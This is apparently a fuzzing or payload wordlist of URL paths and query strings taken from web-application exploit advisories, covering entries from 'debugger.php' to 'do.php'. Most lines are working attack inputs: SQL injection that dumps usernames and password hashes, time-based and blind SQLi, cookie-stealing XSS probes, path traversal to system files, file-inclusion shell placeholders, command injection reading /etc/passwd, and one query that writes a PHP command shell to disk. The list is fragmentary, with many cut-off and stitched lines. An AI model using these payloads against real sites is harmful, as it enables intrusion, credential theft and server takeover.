debugger.php?config_atkroot=<deviL>
debug_php.php?_GET[filename]= [LFİ]
de-ce.net
decide.php?patron=01.'+and+1=1
decide.php?patron=01.'+and+1=2
decide.php?patron=01.'+and+substring(@@version,1,1)=4
decide.php?patron=01.'+and+substring(@@version,1,1)=5
decide.php?patron=n<Blind Sql Code>
deco
decoda
decoda]
decoder
decoding
de.crypt.in
de_downloads
deface.htm">
deface.html";<
defacers.ru
default
default.asp
default.asp?catid=0+and+1=0
default.asp?DisplayFormat=Card&Sort=[SQL]
default.asp?formType=&itemID=" method="post">
default.asp?git=4&sayfa=-3+union+all+select+0,copy,keyword+from+ayarlar
default.asp?id=44[CODE]
default.asp?id=70[CODE]
default.asp?iId=HILHG&pageAction=send" method="post">
default.asp?islem=1&id=[sql code]              #
default.asp?l=1&id=8
default.asp?Page=2&Email='[SQL]
default.asp?pageAction=profile
default.asp?pageid=-7+union+all+select+0,1,2,kullaniciadi,sifre,5+from+user
default.asp?page=news&id=-2+union+all+select+0,kullaniciadi,sifre,3+from+user
default.asp (Parameter FilePath)
default.asp (Parameter = p)
default.asp (Parameter pid)
default.asp (Parameter = sbl)
default.asp (Parameter sbl)
default.asp (Parameter = sbr)
default.asp (Parameter sbr)
default.asp (Parameter = search) 
default.asp (Parameter search)
default.asp?q=<script>alert(document.cookie)<
default.aspx>
default.aspx?CategoryID=66%20and%201=2  false
default.aspx?CategoryID=66%20and%201=2  true
Default.aspx?g=posts&t=89 
Default.aspx (Ticket iD:#2979)
default&file=style.css
DefaultGreen
default.php
default.php%00.gif
default.php?admin_theme_dir=..
default.php?charm=%3E%20%3E%20ScRiPt%20%3EALERT%20529227151633%20%3B%20%2FScRiPt%3E#685828818694793444
default.php?content='2485
default.php?content=[SQLI]
default.php?cPath=[MID]&sort=5a&page=1&action=buy_now&products_id=[PID][JNK]
default.php?dir_inc=[SHELL]
default.php?error_message=%3Cscript%20language=javascript%3Ewindow.alert%28document.cookie%29;%3C
default.php?go=modules.php%3Fname%3DSurveys%26op%3Dresults%26pollID%3D132+and+1=2+union+select+1,version%28%29,3,4--
default.php?&id='121
default.php?id='125
default.php?&id=[SQLI] 
default.php?id=[SQLI]
default.php?info_message=%3Cscript%20language=javascript%3Ewindow.alert%28document.cookie%29;%3C
default.php?portalID='68
default.php?portalID=[SQLI]
default.php?root=shell
default.php?service=prodotti_dettaglio&idpro=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,concat(username,0x3a,password,0x3a,nome,0x3a,cognome,0x3a,azienda,0x3a,email),20,21,22+from+mms_extranet_utenti+where+id=1
default.php?service=prodotti_dettaglio&idpro=[SQL]
default.php?t=download&lang=..
default.php?t=forum&lang=..
default.php?t=news&lang=..
default.tpl.php?template_path=[SHELL]
defense
defense.ballastsecurity.net
definitions
defs.php?l=..
defunt.class.php?path_om=[Shell]
defunttransfert.class.php?path_om=[Shell]
delAddress.php?EventLocationID=x' [SQL]
delAdmin.php?AdminUserID=x' [SQL]
delay.php?sleep=0&file=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fwindows%2fwin.ini
delCalendar.php?CalendarDetailsID=x'[SQL]
delCategory.php?LocationID=x' [SQL]
del_entry.php?gfplugins=[Shell]
dele.php?finame=1
delete
DeleteAccountPage.class.php?base_path=[evil_scripts]
deleteadd.php?ID=[ID]
deleteArticle.php
deleteArticle.php" method="post"
deleteCategory.php
deletecat.php?categoryid=[ID]" method="POST">
^\-(delete|change|add)?$
DeleteComment.Action.class.php?_CONF[path]=[Evil_Script]
deleteComment.php
delete_confirm.php?delete=yes&id=>"><ScRiPt%20%0a%0d>alert(213771818860)%3B<
delete_con.php?id=100
deletecontent.php?action=blogpost&id=1'[SQL_Injection]
deleteCreditCards.asp?id=' 
DeleteDomainServicePage.class.php?base_path=[evil_scripts]
delete_employer.php?id=[USER ID] 
/?deleteEvent=2">
delete_fh.php?id=100
deletefile.php?id=about" alt="Do you see this?" 
deleteforum.php?ID=[ID]" method="POST">
delete.gif"><
DeleteHostingServicePage.class.php?base_path=[evil_scripts]
DeleteInvoicePage.class.php?base_path=[evil_scripts]
deleteItem3.php?noticeID=&userID='and%201=0%20UNION%20SELECT%20'%3C?php%20echo%20system($_GET[%22CMD%22]);%20?%3E','','','','','','','','','','',''%20FROM%20dual%20INTO%20OUTFILE%20'..
delete_log.php?tbl="><script>alert(123);<
delete_mem.php?id=100
deleteMenu.php
delete_message.php?mailbox=[filehere]&message=1
deletePage.php
delete_page.php?id=' or 1=1
delete_page.php?page=1" alt="Do you see this?" 
delete.php
delete.php?comment=1&id=[ID of comment here]
delete.php', data[1], cookie)
delete.php?delete=[eNews_id]
delete.php?file=[file_to_delete]
delete.php?folder=[script]
delete.php?id=-1+UNION+ALL+SELECT+1,@@version,user(),4,5,6,7,8,9,10,11,12,13,14%23
delete.php?id=5&heading=User&sql=star_users where id &redirect=admin.manage.users.php
delete.php?id=[id of account]&mytable=[NAME OF CATEGORY]
delete.php?id=%s&page=1&sn1=&divpage=1&sn=off&ss=off&sc=on&select_arrange=headnum&desc=asc&no=%s\r\n"
delete.php?id=u3&u3=&action=change_group&what=user&new_password=&group=1&delete_files=no&delete_comments=no[
delete.php?id=u[ID]&u[ID]=&action=change_group&what=user&new_password=&group=1&delete_files=no&delete_comments=no
delete.php?installed_config_file=[Evil Script]
delete.php?language=[LFI]
delete.php?news=1&id=[ID of news here]
delete.php?post=".$post_id."&confirm=yes");
delete.php?pwfile=[shell]
delete.php?shout=1&id=[ID of shout here] 
delete.php?s=[id]
delete.php?SPGP=[ID]%7C%7C'%20OR%20''=' 
delete.php?testPath=.
delete.php&username=SirGod&submit=submit
delete.php&username=[USERNAME]&submit=submit
delete_pic.php?id=100
delete_post.php?post=1" alt="Do you see this?" 
deleteposts.tpl.php?CFG[skin]=..
DeleteProductPage.class.php?base_path=[evil_scripts]
deleteread.php" method="POST">
delete_resell.php?id=100
DeleteServerPage.class.php?base_path=[evil_scripts]
deleteset.php
deletethread.php?board_id="><script>alert(document.cookie)<
deletethread.tpl.php?CFG[skin]=..
delete?token=true&id=2">
delete?token=true&id=405">
delete_user.php?id=100
delete_user.php?user=2" alt="Do you see this?" 
DeleteUser.php?UserID=".$i);
DeleteUser.php?UserID=[uid]
deleteUser?userId=2' 
delfile.php?cam=&dlfile=.
del_im.php?id=100&name=1158375471_0_sub.JPG
delitem.php?room=1
delitem.php?room=$room id
delitem.php?user=5
delitem.php?user=user id
delivering-argentina.php (sell script)
del_layer.php?gfplugins=[Shell]
dellist.php" method="POST">
deloffer.php" method="post">
del.php?cdel=%27 HTTP
del.php?include_path=[SHELL-TRYAG]     #
del.php?pollorder=1
del.php?post_id=1&confirm=yes
del.php?post_id=[postid]&confirm=yes
delpm.php?id=[PMID]&a=[Target user name] 
delpm.php?id=<script>JavaScript:alert(document.cookie);<
delreq.php?categ=UNION+ALL+SELECT+1,2,3,4,5,username,password,email+FROM+users--+
delreq.php?categ=waraxe
deltahacking.net (priv8)
deluser.php
deluxe
demande_avis.class.php?path_om=[Shell]
demarrage.php?racine=[shell]
demium_beta_v.0.2.1
demium_beta_v.0.2.1.rar
demoactivebids
demoactivebusinessdirectory
demoactivephotogallery
demoactivepricecomparison
demoactivetimebilling
demoactivewebhelpdesk
demo.admidio.org
demo_aff4
demo.php?idTableProduit=-63+union+select+1,2,3,4,5,6,7,8,9,version(),11,12,13,14,15,16,17,18,19,20--
demo.php  "index.php"          =
demo.phpmembers.com
demo.phpmotiontemplates.com
demo_press2
demos
demo_se
demoserver
demo.site
demo_standard
Denapars
department.php
deploy
dept
deptUploads_data.php?groupid=1 union select 1,2, IF (%s=conv(mid((select password from users),%s,1),16,10),SLEEP(%s),null);--' % (i,pos,timing)
dereferer.php?arsc_link=[RFI]
derefer.php?go=joxy%00">
derefer.php?go=zeroscience.mk
dereferrer.php?url=javascript:alert("Example");
desc
descargas
descendancy.php?pid=<iframe>
desc.php?pid=328
desc.php?pid=378
description.php?id=1'
description.php?II=-1' UNION SELECT 1,2,3,4,5,6,7%23&UID=VALID UID HERE
DESC]&search=[CROSS
DESC]&search=&orderBy=[CROSS
DESC]&search=&orderBy=[SQL-INJECTION]
design
design-and-development
designer.php?id=-999+UNION+all+SELECT+1,version(),database(),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26--
designformamb0.c0m
design.inc.php?dir[data]=[evil_scripts]
design-joomla.eu
design.php?delete=[SQL]
designs
designview.php?designid=[id number]
Desi-Short-Url-Script-42484.html
deskpro_v1
DesktopCalendar
desktopmodules
DesktopModules
desktop.php?baccio=eyeOptions.eyeapp&a=eyeOptions.eyeapp&_SESSION[usr]=root&_SESSION[apps][eyeOptions.eyeapp][wrapup]=phpinfo(); 
destek
destinataire.class.php?path_om=[Shell]
detail1.php?h_id=-5%20union%20select%20concat%28username,0x3a,password%29%20from%20jos_users--
detail2.php?h_id=-5%20union%20select%20concat%28username,0x3a,password%29%20from%20jos_users--
detail3.php?h_id=-5%20union%20select%20concat%28username,0x3a,password%29%20from%20jos_users--
detail4.php?h_id=-5%20union%20select%20concat%28username,0x3a,password%29%20from%20jos_users--
detail5.php?h_id=-5%20union%20select%20concat%28username,0x3a,password%29%20from%20jos_users--
detail6.php?h_id=-5%20union%20select%20concat%28username,0x3a,password%29%20from%20jos_users--
detail7.php?h_id=-1%20union%20select%201,2,3,concat%28username,0x3a,password%29,5%20from%20jos_users--
detail8.php?h_id=-5%20union%20select%201,concat%28username,0x3a,password%29,3,4%20from%20jos_users--
detail_ad.asp?siteid=[sqli]
detail.asp?iPro=[ur injection code]
detailbw.html?mon=Jan&year=2006&domain=xxx"><script>alert('vul')<
detailbw.html?mon=Jan&year=2006&domain=xxx&target="><script>alert('vul')<
detailbw.html?mon=Jan&year=2006"><script>alert('vul')<
detailcode.asp?Mode=Load&DID=7&Redirect=QUHG
detailed
Detailed
DetailFile.php?nFileId=-40+union+select+1,2,3,group_concat%28UserPass,0x3a,UserName%29,5,6+from+admin_user_info--
DetailFile.php?nFileId=[SQL]
detail?id=2
detail?id=212
detail?id=3
detail?id=66
detail?id=78>)
detail.jsp?fid=security_advisory&pvid=security_advisory&year=2012&suid=20120517_00' ]
detail.jsp?fid=security_advisory&pvid=security_advisory&year=2012&suid=20120720_00
detail.jsp?fid=security_advisory&pvid=security_advisory&year=&suid=20130725_00
detaillist.php?produid=-1
detaillist.php?produid=-1 union all
detaillist.php?produid=[SQL]
detail_news.php?id_article=7[SQLI]
detail.php?act=show&cat=1+union+select+1,2,concat_ws(0x3a,user,passwort),4,5+from+elink_user
detail.php?articleId=">
detail.php?articleId=-1 UNION SELECT 1,2,3,4,5,6,concat_ws(0x3a,version(),database(),user()),8,9,10,11,12,13,14,15,16,17,18,19--
detail.php?cat=44+and+1=1  
detail.php?cat=44+and+1=2 
detail.php?doc_id=[sqli]
detail.php?h_id=-5%20union%20select%201,2,3,4,5,6,7,concat%28username,0x3a,password%29,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3%20from%20jos_users--
detail.php?id=
detail.php?id=1#comments 
detail.php?id=1"  -p id  --cookie="XXX"  --dbs
detail.php?id=1 -->SQL Injection
detail.php?id=1;[SQL INJECTION]
detail.php?id=34&page_id=-3%20union%20select%201,group_concat%28login,0x3a,password%29,3,4,5,6+from+login_table
detail.php?id=-647+union+select+1,2,3,pass,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23+from+user
detail.php?id=7'
detail.php?id=[Blind> SQL INJECTION]
detail.php?id=[SQL]
detail.php?id=[SQLI]
detail.php?image=u0646ur0xm.gif&name=g4n0k%22%3E%3Cscript%3Ealert(%27G4N0K%27)%3C
detail.php?image=u0646ur0xm.gif&name=g4n0k&price=20&id=-13' UNION ALL SELECT 1,2,3,4,5,6,concat(username,0x3a,password),8,9,10,11+FROM+admin--+AND+'GNK'='GNK
detail.php?image=u0646ur0xm.gif&name=g4n0k&price=20&id=-13'+UNION+ALL+SELECT+1,2,3,4,5,6,user(),8,9,10,11--
detail.php?item_id=-1+UNION+SELECT+1,2,3,4
detail.php?item_id=575+AND+SUBSTRING(@@version,1,1)=4 << false
detail.php?item_id=575+AND+SUBSTRING(@@version,1,1)=5 << true
detail.php?link_id=-1
detail.php?listingid=-1
detail.php?name=JetPhoto_Album&page=<script>alert(document.cookie);<
detail.php?nr=6501+and+1=0
detail.php?nr=70+and+1=1
detail.php?prod_detail=369+union+select+1,2,3,4,@@version,6--
detail.php?prod_detail="><script>alert(document.cookie)<
detail.php?prod_detail=[SQL-Injection]
detail.php?prod_detail=[SQL-Injection] 
detail.php?prodid=999999+UNION SELECT
detail.php?prodid=[SQL-Injection] 
detail.php?sid=80 and 1=1--             
detail.php?sid=80 and 1=2--            
detail.php?siteid=-99999999+union+select+1,concat(user(),0x3a,version(),0x3a,database()),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71,72,73,74,75,76,77,78+from+user
detail.php?siteid=[SQL]
detail.php?spid=15
detail.php?spid=30
detail.php?spid=44                
detail.php?spid=54
detail.php?template=..
detail.php?t=exhibitions&type=exh&f=&s=-1+UNION+SELECT+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15
detail_produit.php?id_shop=3&ref=200308G[SQLI]
details
details"
details.html
details_million-platinum.php  ]
details_news.php?n=det&idnew=-1
details o\n";
details.php?file=50
details.php?id=112 UNION SELECT 1,2,3,4,version(),6,7,8
details.php?id=-1+union+select+1,version(),3,user(),0x48757373696E5F585F5F5761735F68657265,6,7,8,9,10--
details.php?id=63174+and+1=0%23  --> False
details.php?id=63174+and+1=1%23  --> True
details.php?id=".$id;
details.php?id=[sql]
details.php?linkid=-68+and+1=2+union+select+1,2,3,4,5,6,7,8,9--
details.php?linkid=[SQL Codes]
details.php?p_id=[SQL Injection]
details.php?prodId=[SQL]
details.php?scriptid=161&name=Leap	     |
details.php?scriptid=161&name=Leap	      |
details.php?scriptid=337
details.php?scriptid=337                                                                            
details.php?scriptid=94&name=osCommerce)
details_res.php?sbres_id=121%20and%20substring(@@version,1,1)=5
DetailsView.do?method=showMGDetails&groupId=10003645+UnION+
details-zur-sicherheitslucke-in-xtcommerce
detailView.inc.php?rel=[cmd_url]
detailView.inc.php?rel=[evil_scripts]
detail?vulnId=CVE-2009-4018  (12
detalle_articulo.php?id_producto=
detalle_articulo.php?id_producto=-7+union+select+1,customers_password+from+customers--
dev
devalcms
devalcms                            #
[devalcms_path]
devana
devana.eu
dev.cmsmadesimple.org
devel
developer
developer.berlios.de
developer.joomla.org
developers
developers.jccorp.net
development
Development.php?GLOBALS[sugarEntry]=1&theme=..
development-tools
devformatter
devformatter.php">
deviceadd.php?name=test&mac=0001.0001.0001&status=1+AND+SLEEP(20)&vlan=6&username=2&office=1&comment=&action=Update&action_idx=1
deviceadd.php?name=test&mac=0001.0001.0001&status=1&vlan=6&username=2&office=1&comment="><script>alert(2)<
devilsnight.altervista.org
devilsnight.altervista.org                                                              #
devilsnight.altervista.org                                         #
devilteam639
devilteam.eu
devilteam.jpg?cmd=ls -la
devilteam.pl
devilzc0de.org
devilzc0de.org   (as Member)
devmass.cart.1.0.tar||
dev.oscss.org
devphp_2bgal.php
dev.pucit.edu.pk
dev.sourcefabric.org
dev.tiki.org
devtools
dev.virtuemart.net
dev.xoops.org
df
df2k
df2.sourceforge.net
dfblog
dfiles
dfn.dl.sourceforge.net
dforum
DGS-SEC-3.html' ]
dhat-ajax-cat-dropdown-request.php?admin&category_id=%22%3E%3Cscript%3Ealert%28document.cookie%29;%3C
dhat-ajax-cat-dropdown-request.php?admin&category_level=2&category_id=1%20union%20select%201,user%28%29,3,4,5,6,7,8,9,version%28%29%20--%201
dhat-ajax-cat-dropdown-request.php?get_form_countries&cat_id=SQL_CODE_HERE
dhat-ajax-cat-dropdown-request.php?savepostcat&post_id=1&category_id=SQL_CODE_HERE
dhbcms
dhcp
dhcp.cgi
dhost.info
dhtmltextarea
diagdns.php?host=google.com%5C%27+%26%26+cat+%2Fetc%2Fpasswd+%23
dialog
dialog.php?lang=..
dialogs
diamondlist )
diary
diary.html?storyid=2997
diary.php?date=2004-12-21
dicshunary
dictionary
dienste
dieselpay
diferior-8-03-released
difffile.php
DiffieHellman.php?_ENV[asicms][path]=
diff.kasseler-cms.net
diff.php?GLOBALS[pie][library_path]=[evilcode]
diger.php?KayitNo=-99999999+union+select+null,null,concat(user(),0x3a,database(),0x3a,version()),null,null
diger.php?KayitNo=[SQL]
digital-delusions.dyn.ee";
digitaleye_Path
digitalscribe
digitalus-1100-alpha2-arbitrary-file.html
digitalwebshop.dyndns.org
dig.php?ns=||COMMAND HERE||&host=mortal-team.net&query_type=NS&status=digging
dig.php?ns=||whoami||&host=mortal-team.net&query_type=NS&status=digging
dimension_entry.php
dimension_entry.php?trans_no=
dimensions
dione_form_wizard
dir
[dir]
$dir
dir'
[DIR]
diraccess.php?path_faqe=[INDONESIANCODER]
dir_admins
..dir&avatar=myfile
dirdetails.php?iddirector=[SQL]
direct
direction.class.php?path_om=[Shell]
directiongenerale.class.php?path_om=[Shell]
directnews
directory
[directory]
[directory]<
[Directory]
directory,1
directory-a-documentation
directory-design
directory hex
directory)\n";
directory.php
directory.php?ax=deadlink&id=-14+union+select+1,2,concat_ws(0x3a,email,password,version(),user(),0x48757373696E5F58)+from+links--
directory.php?ax=deadlink&id=-3+UNION SELECT 1,2,concat(user(),0x3a,database(),0x3a,version())--
directory.php?ax=list&l=list_by&cat_id=1
directory.php?ax=list&l=list_by&cat_id=[exploit]
directory.php?ax=list&sub=1&cat_id=-1
directory.php?ax=list&sub=1&cat_id=1+union+select+0,1,version(),database()
directory.php?ax=list&sub=3&cat_id=-1+union+all+select+1,2,concat_ws(password,email),4,5,6,7,8,9,10,11,12,13+from+links
directory.php?ax=list&sub=3&cat_id=-1+union+all+select+1,2,@@version,4,5,6,7,8,9,10,11,12,13+from+links
directory.php?ax=list&sub=3&cat_id=[sql]
directory.php?ax=list&sub=6&cat_id=1
directory.php?ax=list&sub=6&cat_id=-1
directory.php?ax=list&sub=7&cat_id=-1
directory.php?ax=list&sub=7&cat_id=-1%20union%20select%201,2,concat(id,0x3a,name,0x3a,email,0x3a,password),4,5,6,7,8,9,10,11,12,13,14%20from%20links--
directory.php?ax=list&sub=8&cat_id=-1
directory.php?cat=-1
directory.php?cat=-9+union+select+1,2,3,4,5,6,7,database(),9,10,11,12,13,14
directory.php?cat=-9+union+select+1,2,3,4,5,6,7,@@version,9,10,11,12,13,14
directory.php?username=demo&ax=list&sub=51&cat_id=51+union+select+0,1,version(),database(),4
directory.php?username=&idDirectory=2" -p Top
directory.php?username=&idDirectory=2\" -p Top
directory.php?username=&idDirectory=58
[DIRECTORY_SEPARATOR]
directory&token=92aa6ac32b4c8e7a175c3dc9f7754d25" method="post">
direct.php?rf=
/?dir=home&page_id=[sql]
dir)\n";
dir_on_server
/?dir=PHP
dirs
/?dir=Scene&file=PElGUkFNRSBTUkM9ImphdmFzY3JpcHQ6YWxlcnQoJ1hTUycpOyI+PC9JRlJBTUU+
/?dir=[sql]
dirsys
dir-to-remove
disarm.free.fr
Discipline
disclaimer.php
discloser
discloser.sourceforge.net
disclosure-policy-plugin
DiscReply.php?forum_id=1&mid=[SQL]
discuss
discussion
discussion.php3?GLOBALS[AA_INC_PATH]=[evil_scripts]
Discussions.php?forum_id=[SQL]
Discuz
DiscView.php?mid=144&forum_id=[SQL]
diseaseinfo.php
diseaseinfo.php?strDiseaseName=1'{SQLHERE}
diseno-grafico
diseno-web
dish.php?id=[sqli]
disiliskiler
disk1
diskusage.html?showtree=0"><script>alert('vul')<
disp_album.php?id_album=2%20UNION%20SELECT%20passwd%20as%20nom,%20idpere%20FROM%20galbumlist%20LIMIT%201;-- 
dispatcher
dispatcher.php?uri=..
dispatch.php?atkaction=search&atknodetype=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fboot.ini%00.search&searchstring=3
dispatch.php?atkaction=vcard&atklevel=1&atkprevlevel=0&atkstackid=4f2467eae0518&id=3'
dispatch.php?atknodetype=employee.userprefs&atkaction=edit&atkselector=(SELECT%201%20FROM%20(SELECT%20SLEEP(25))A)&atklevel=-1&atkprevlevel=0&=3
dispatch.php?atknodetype=project.activity&atkaction=stats&activityid=0%20UNION%20SELECT%201,version%28%29,3,4
dispatch.php?atknodetype=project.project&atkselector=project.id='XXXX'&atkaction=delete&atklevel=1&atkprevlevel=0&confirm=Yes 
dispatch.php?atknodetype=timereg.hours&atkaction=delete&atkselector=hoursbase.id='XXXX'&confirm=Yes 
dispatch.php?atknodetype=timereg.hours&atkaction=delete&atkselector=hoursbase.id='XXXX' (where XXXX. is the actual ID of the activity to be deleted) 
dispatch.php (GET: atklevel, atkaction, atkstackid,
dispense.class.php?path_om=[Shell]
disphtmltbl.php?root_path=[evil script]
display
display_agents.php?id=243'
display_agents.php?id=-243+union+select+all+1,2,3,version(),5,user(),7,8--
display_all_heap] [-cookiename=phpbb2mysql]
displayecard.php?data=[$injection] HTTP
/?DisplayFormat=>"><ScRiPt>alert(1369)%3B<
displayimage
displayimage.php?album=random&pos=[album id]     |
displayimage.php?pid=1
displayimage.php?pid=-1+union+select+1,2,3,now(),version(),user()
display.php
display.php?cartid=200505024231092&zid=1&lid=1&nlst='"><script>alert(document.cookie)<
display.php?cartid=200505024231092&zid=1&lid=1&nlst=y&olimit=0&cat=&key1=&psku='SQL_INJECTION 
display.php?cmd=whoami
display.php?cmd=[YOUR COMMAND]
display.php HTTP
display.php?path=[EVIL]
display.php?range=view&id=0%20UNION%20SELECT%20null,null,null,null,null,null,uid,username,password,email,null,null,null,null,null,null,null,null,null,null%20%20FROM%20users--&iprange=0&netid=0
display.php?template= {file + nullbyte}
display.php?usecache=1&s=....
display.php?usecache=1&s={file + nullbyte}(mq = off)
display.rar        *|
display.rar\n";
displayResource.php?id=
DisplayResults.php?DOMAIN_Link=&iSearchID=292&sKeywords=%22%3E%3Cscript%3Ealert%28%27r0t%27%29%3C%2Fscript%3E 
display_ticket_thread.php?type=comment&sid=a640d024f84be01320aacb0ec6c87d74&ticket=[SQL] 
disposable-email-script.htm
dispxls.php?root_path=[evil script]
dist
distfiles
distributedStatusDetails.htm
distributedStatusHistory.htm
distribution
ditcms.org
div
div><
div>  <
div>'),
div>"
div>";
div%3E
div>    <div class="container_body_3">{$filetransfer_language[4]}<
div>      <div class="container_body_4">{$filetransfer_language[3]}<
div>    <div class="container_body">    <div class="container_body_1">{$filetransfer_language[2]}<
div><div class=\"footer\"><b>$header[main]<
div>  <div id="select-0" class="container_body_2"><label class="cabinet"><input type="file" class="file" name="Filedata" onchange="javascript:document.upload.submit()"
div>  <div style="clear:both"><
div>   <div style="clear:both"><
div><div style="float:right"><input type=submit value="{$otavchat_language[17]}" class="invitebutton"><
div>    <div style="height:162px;overflow-x:hidden;overflow-y:scroll;clear:both;padding-left:5px;padding-top:5px;padding-bottom:5px;">{$s['available']}{$s['away']}{$s['offline']}<
DIVE
divers
diversen
divers.php?action=envoyer&id=1%22%3Cscript%3Ealert(9)%3C
divers.php?action =liste&liste=email&desc=[SQL CODE]&pages=1
divers.php?action=liste&liste=[SQL CODE]
div>    <input type="hidden" name="roomid" value="$id">  <
div>    <input type="hidden" name="to" value="{$toId}">  <input type="hidden" name="chatroommode" value="{$chatroommode}">    <
div>$menu";
div>    <script>  SI.Files.stylizeAll();  <
dixieandtheninjas.net
diy
diy-cms
DiY-CMS-Download-63258.html] 
diycms_v1.0
[dizin]
Dj7xpl.2600.ir
Dj7xpl.2600.ir                                                                    +
dj7xpl.by.ru
dj7xplby.ru
dj7xpl.ir
dj-artgallery.html
djcat
djcatalog-1.5.x
dj-classifieds
dj-mobile
dj-sailing
djump.php?ID=6285
dl
dl1_user
dlarea
dl-authcontent.php?docroot=..
dl-authcontent.php?docroot=[LFI]
dlc.php?file=88&id=1269641667
dldb.php?op=view&id=157
dldb.php?op=view&id=204
dldb.php?op=view&id=281
dle
dl_engine
dl-esforum-3.html
dl_jump.php?id=42
dl-maincatsearch-dlcontent.php?docroot=..
dl-maincatsearch-dlcontent.php?docroot=[LFI]
dlman.php?func=file_info&file_id='[SQL Injection] 
dload
dloader.php?fName=..
dload.php?action=category&cat_id=16
dload.php?action=download&file_id=15
dload.php?action=download&file_id=17
dload.php?action=download&file_id=21
dload.php?action=download&file_id=336
dload.php?action=download&file_id=342
dload.php?action=download&file_id=364
dload.php?action=download&file_id=371
dload.php?action=download&file_id=55
dload.php?action=download&file_id=70
dload.php?action=file&file_id=171
dload.php?action=file&file_id=538
dload.php?file=dload.php
dload.php?id=bmachine-3.1.rar
dloads
dloads-header.php?docroot=[RFI]
dloadsmainincs
dloads-payed.php?docroot=...
dloads-payed.php?docroot=[LFI]
dloadstplates
dl.openrat.de
dl.p30vel.ir
dl.php?file=4e84e50f89bf7
dl.php?file=twg_latest    
dl.php?id=1
dl.php?id=2
dl.php?id=3
dl.php?idscript=5
dl.php?p=
dl.php?type=i&id=1 and 0x0=0x1 union select 1,2,3,4,CONCAT(username,0x3a3a3a,password),6,7 from tbladmins --
dl.php?wph=localhost&wpdb=test&user=root&wpp=root&id=0
dl.sugarforge.org
dm
~dmaeder
dm-albums
dm-albums.php?download=yes&file=config.php&currdir=
dmcms
dm-filemanager
dmin
dmitry.dn.ua
dmo
DMO
dm-up
dmx
dnd_normal
dnd-upload.php
dnd-upload.php");
dnet
dnet_admin
dnetCMS
dnetlivestats
dnnarticle
dnnarticlerss.aspx?moduleid=0&categoryid=1+or+1=@@version
dnstools.php?section=hosts&user_logged_in=true
dnstools.php?section=security&user_logged_in=true&user_dnstools_administrator=YES
do
/?d=O1W4DX97
doaddftp.html">
do_add.php" method="post">
doadd.php?type=user%20(email,level,password)%20values%20('test@test.com',256,md5('Password1'));%23&name=
doajaxfileupload.php");
/?do=allcat&id=-1+union+select+concat(user_name,0x3a,password)+from+admin_users--
/?do=article&action=show
doc
DOC-21767.
doc_details
doc_download
docebo
docebocms
doceboCms
doceboCore
doceboKms
docebolms
doceboLms
DoceboLMS_404
doceboScs
doc_identite.class.php?path_om=[Shell]
doc.jpg id\n";
doc.js><
doc.js :
docman
docmanager
docman.php?gfcommon=[Shell]
DocMan.php?path=.
/?do=cms&action=news&id=[SQLi]
doc.php?action=inline&doc_id=-1%20UNION%20ALL%20SELECT%200x2E2E2F696E6465782E706870,0x746578742F706C61696E,null,null,null,null,null
docpile-we.berlios.de
docs
DocsGroupSearchEngine.class.php?gfwww=[Shell]
DocsHtmlSearchRenderer.class.php?gfwww=[Shell]
docs.php?doc=..
docs.php?docs="+escape
DocsSearchQuery.class.php?gfcommon=[Shell]
doctypetemplates
docu
document
documentation
Documentation
documentation.php?action=
Document.class.php?gfcommon=[Shell]
/?'+document.cookie<
/?'+document.cookie;<
document_data.static.action.php?id=
DocumentFactory.class.php?gfcommon=[Shell]
document.form.php?id=4
DocumentGroup.class.php?gfcommon=[Shell]
DocumentGroupHTML.class.php?gfwww=[Shell]
document.php?id=10+and+1=2+union+select+1,2,3,4,5,6,7,8,9,concat_ws(0x3a,user_email,user_passwd),11,12+from+users--
document.php?id=15570+and+1=2+union+select+1,2,3,4,5,6,7,8,9,concat_ws(0x3a,user_email,user_passwd),11,12+from+users--
document.php?id_document=1 and substring(@@version,1,1)=4
document.php?id_document=1 and substring(@@version,1,1)=5
document.php?id_document=[SQL]
document.php?id=[SQL]
document.php?lang=%22%3E%3Cscript%3Ealert%280%29%3C
document.php?modulepart=project&file=..
documents
Documents
documents.php?categoryID=2+and+substring(@@version,1,1)=3 ( false )
documents.php?categoryID=2+and+substring(@@version,1,1)=4 ( true )
"+document.xploit.victim.value+"admin
"+document.xplt.victim.value+"home
do_del.php?User=2&uType=Staff" alt="Do you see this?" 
do_del.php?User=[userID]&uType=Staff 
dodelpop.html?email=<script>alert('vul')<
dodosquiz.php?n=[LocalFile]
dodoupload
do_edit.php" method="post">
/?do=featured&action=showmaincatlanding&maincatid=-99999
/?do=featured&action=showmaincatlanding&maincatid=[SQL]
/?do=featured&action=showmaincatlanding&maincatid=[SQLi]
dogansar.org
dogarchive
dogarchive          	                     |
dogarchive          	                      |
dogfood
dohtaccess.html?dir=[code]
dokeos
doku.php?cmd=ls%20-la" method="post" enctype="multipart
doku.php?config_cascade[main][default][]=ftp:
doku.php?id=programming:php:adminlog
dokuwiki
dokuwiki_2006-03-09b_cmd.html,
dokuwiki-2009-02-14
dokuwiki-2009-12-25b.tgz
dokuwiki-2009-12-25.tgz
dolibarr-3.0.0
dolphin
Dolphin
dolphin-7-0-8-beta-1
domain
; domain=";
[domain]
$domain
<=- Domain -=>
Domain Name
[DOMAIN NAME]
[DOMAINNAME]
domain_name_software_auctions
DOMAIN_NAME.TLD
DomainServicesPage.class.php?base_path=[evil_scripts]
DomainsPage.class.php?base_path=[evil_scripts]
domains.php?plan_id=[SQL]
domain.tld
DOMAIN_TLD
dominantcreature
dompdf
dom.php?path=[Bad Code]
domus
/?do=myaccount
don3
DON3
don3_requiem.don3app
don3_requiem.php?app_path=SH3LL?
door
do.php?chmod=
do.php?d=
do.php?mkdir=
